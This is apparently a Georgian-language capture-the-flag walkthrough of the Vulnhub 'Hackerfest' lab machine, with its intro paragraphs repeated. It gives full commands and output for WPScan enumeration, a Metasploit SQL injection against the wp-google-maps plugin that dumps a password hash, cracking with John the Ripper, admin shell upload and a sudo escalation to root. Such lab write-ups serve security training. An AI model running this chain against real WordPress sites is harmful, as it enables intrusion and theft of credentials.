გამარჯობა მეგობრებო, დიდიხანია აღარაფერი დამიწერია და ვიფიქრე ისევ Vulnhub სავარჯიშოს განვიხილავთქო... მოკლედ დღევანდელ სავარჯიშოს ჰქვია Hackerfest, ჰაკერფესტი არის ივენთი რომელიც ტარდება ყოველწლიურად და წელს გამოტანილი იყო ეს CTF დავალება
მანქანის გადმოწერა შეგიძლიათ აქედან : CYBSECGROUP
ჩავრთოთ მანქანა და დავიწყოთ მისი ქსელში აღმოჩენით Angry IP-ის გამოყენებით
IP -ს აღმოჩენის შემდეგ შევიდეთ ამ აიპი მისამართზე (ჩემს შემთხვევაში აიპი იყო : 192.168.50.185)
აიპი მისამართზე გვხვდება Wordpress საიტი, დავიწყოთ ენუმერაცია WPScan -ის საშუალებით
სკანირების რეზულტატი გამოიყურება შემდეგნაირად:
როგორც ხედავთ პლაგინს wp-google-maps გააჩნია SQL ინექცია, რომელიც შეგვიძია გამოვიყენოთ, ასევე ენუმერაციამ მოგვცა საშუალება დაგვედგინია მომხმარებლის იუზერნეიმი webmaster
ამ ინექციის ექპლოიტი შეგვიძლია ვიპოვნოთ metasploit framework-ში
ჩვენ შევძელით იუზერის პაროლის ამოღება ($P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1) , და ვცადოთ მისი გაშიფვრა
მე გამოვიყენებ johntheripper-ს და ყველა პოპულარულ ვოდლისტს rockyou.txt
ჩავწეროთ ჰეში ტექსტურ ფაილში და გავუშვათ შემდეგი კომანდი
პაროლი იყო : kittykat1
პაროლის გამოყენებით ჩვენ შეგვიძლია გავხსნათ შელი ისევ msf-ს გამოყენებით
დავაიმპორტოთ ტერმინალი და გადავიდეთ ვებმასტერის იუზერზე
სერვერზე webmaster-ის იუზერს სუდოს ნებისმიერ ბრძანებაზე აქვს უფლება ამიტომაც პრივილეგიების ესკალაცია არაა საჭირო
გავსხნათ რუთის შელი
სულ ეს იყო, გისურვებთ წარმატებას!
მანქანის გადმოწერა შეგიძლიათ აქედან : CYBSECGROUP
ჩავრთოთ მანქანა და დავიწყოთ მისი ქსელში აღმოჩენით Angry IP-ის გამოყენებით
IP -ს აღმოჩენის შემდეგ შევიდეთ ამ აიპი მისამართზე (ჩემს შემთხვევაში აიპი იყო : 192.168.50.185)
აიპი მისამართზე გვხვდება Wordpress საიტი, დავიწყოთ ენუმერაცია WPScan -ის საშუალებით
სკანირების რეზულტატი გამოიყურება შემდეგნაირად:
┌─[[email protected]]─[/home/z3r0/Downloads]
└──╼ #wpscan --enumerate u,p --url http://192.168.50.185
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.6.3
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://192.168.50.185/
[+] Started: Thu Oct 31 05:42:39 2019
Interesting Finding(s):
[+] http://192.168.50.185/
| Interesting Entry: Server: Apache/2.4.25 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://192.168.50.185/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://192.168.50.185/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.50.185/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] http://192.168.50.185/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).
| Detected By: Rss Generator (Passive Detection)
| - http://192.168.50.185/?feed=rss2, <generator>https://wordpress.org/?v=5.2.3</generator>
| - http://192.168.50.185/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.2.3</generator>
|
| [!] 6 vulnerabilities identified:
|
| [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9908
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9909
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
| - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
| - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
|
| [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9910
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9911
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9912
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation
| Fixed in: 5.2.4
| References:
| - https://wpvulndb.com/vulnerabilities/9913
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
[+] WordPress theme in use: twentyseventeen
| Location: http://192.168.50.185/wp-content/themes/twentyseventeen/
| Latest Version: 2.2 (up to date)
| Last Updated: 2019-05-07T00:00:00.000Z
| Readme: http://192.168.50.185/wp-content/themes/twentyseventeen/README.txt
| Style URL: http://192.168.50.185/wp-content/themes/twentyseventeen/style.css?ver=5.2.3
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Detected By: Css Style (Passive Detection)
|
| Version: 2.2 (80% confidence)
| Detected By: Style (Passive Detection)
| - http://192.168.50.185/wp-content/themes/twentyseventeen/style.css?ver=5.2.3, Match: 'Version: 2.2'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] wp-google-maps
| Location: http://192.168.50.185/wp-content/plugins/wp-google-maps/
| Last Updated: 2019-10-25T13:36:00.000Z
| [!] The version is out of date, the latest version is 8.0.7
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 4 vulnerabilities identified:
|
| [!] Title: WP Google Maps <= 7.10.41 - Cross-Site Scripting (XSS)
| Fixed in: 7.10.43
| References:
| - https://wpvulndb.com/vulnerabilities/9243
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9912
| - https://security-consulting.icu/blog/2019/02/wordpress-wpgooglemaps-xss/
| - https://lists.openwall.net/full-disclosure/2019/02/05/13
|
| [!] Title: WP Google Maps 7.11.00-7.11.17 - Unauthenticated SQL Injection
| Fixed in: 7.11.18
| References:
| - https://wpvulndb.com/vulnerabilities/9249
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10692
| - https://plugins.trac.wordpress.org/changeset/2061434/wp-google-maps/trunk/includes/class.rest-api.php
|
| [!] Title: WP Google Maps <= 7.11.27 - Admin Settings CSRF
| Fixed in: 7.11.28
| References:
| - https://wpvulndb.com/vulnerabilities/9332
| - https://plugins.trac.wordpress.org/changeset/2099647/wp-google-maps/trunk/legacy-core.php?old=2092302&old_path=wp-google-maps%2Ftrunk%2Flegacy-core.php
|
| [!] Title: WP Google Maps <= 7.11.34 - CSRF to Stored XSS
| Fixed in: 7.11.35
| References:
| - https://wpvulndb.com/vulnerabilities/9442
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14792
| - https://plugins.trac.wordpress.org/changeset/2119722
|
| Version: 7.10.02 (50% confidence)
| Detected By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.50.185/wp-content/plugins/wp-google-maps/readme.txt
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] webmaster
| Detected By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
[+] Finished: Thu Oct 31 05:42:45 2019
[+] Requests Done: 72
[+] Cached Requests: 7
[+] Data Sent: 14.607 KB
[+] Data Received: 26.185 MB
[+] Memory used: 212.352 MB
[+] Elapsed time: 00:00:05
როგორც ხედავთ პლაგინს wp-google-maps გააჩნია SQL ინექცია, რომელიც შეგვიძია გამოვიყენოთ, ასევე ენუმერაციამ მოგვცა საშუალება დაგვედგინია მომხმარებლის იუზერნეიმი webmaster
ამ ინექციის ექპლოიტი შეგვიძლია ვიპოვნოთ metasploit framework-ში
Code:
┌─[[email protected]]─[/home/z3r0/Downloads]
└──╼ #msfconsole
msf5 > use auxiliary/admin/http/wp_google_maps_sqli
msf5 auxiliary(admin/http/wp_google_maps_sqli) > show options
Module options (auxiliary/admin/http/wp_google_maps_sqli):
Name Current Setting Required Description
---- --------------- -------- -----------
DB_PREFIX wp_ yes WordPress table prefix
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
VHOST no HTTP server virtual host
msf5 auxiliary(admin/http/wp_google_maps_sqli) > set RHOSTS 192.168.50.185
RHOSTS => 192.168.50.185
msf5 auxiliary(admin/http/wp_google_maps_sqli) > run
[*] Running module against 192.168.50.185
[*] 192.168.50.185:80 - Trying to retrieve the wp_users table...
[+] Credentials saved in: /root/.msf4/loot/20191031062337_default_192.168.50.185_wp_google_maps.j_401116.bin
[+] 192.168.50.185:80 - FoundX webmaster $P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1 [email protected]
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/wp_google_maps_sqli) > exit
მე გამოვიყენებ johntheripper-ს და ყველა პოპულარულ ვოდლისტს rockyou.txt
ჩავწეროთ ჰეში ტექსტურ ფაილში და გავუშვათ შემდეგი კომანდი
Code:
┌─[[email protected]]─[~/Desktop]
└──╼ $john --wordlist=./rockyou.txt hash.txt
პაროლის გამოყენებით ჩვენ შეგვიძლია გავხსნათ შელი ისევ msf-ს გამოყენებით
Code:
msf5 > use exploit/unix/webapp/wp_admin_shell_upload
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.50.185
RHOSTS => 192.168.50.185
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username webmaster
username => webmaster
msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password kittykat1
password => kittykat1
msf5 exploit(unix/webapp/wp_admin_shell_upload) > run
Code:
meterpreter > shell
Process 5440 created.
Channel 2 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory
su webmaster
su: must be run from a terminal
python -c 'import pty;pty.spawn("/bin/bash")'
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
[email protected]:$ su webmaster
su webmaster
Password: kittykat1
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
[email protected]:$
გავსხნათ რუთის შელი
Code:
[email protected]:$ sudo -s
sudo -s
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
[email protected]:.# cd /root
cd /root
chdir: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
[email protected]:~# ls
ls
flag.txt
[email protected]:~# cat flag.txt
cat flag.txt
3dcdf93d2976321d7a8c47a6bb2d48837d330624
[email protected]:~#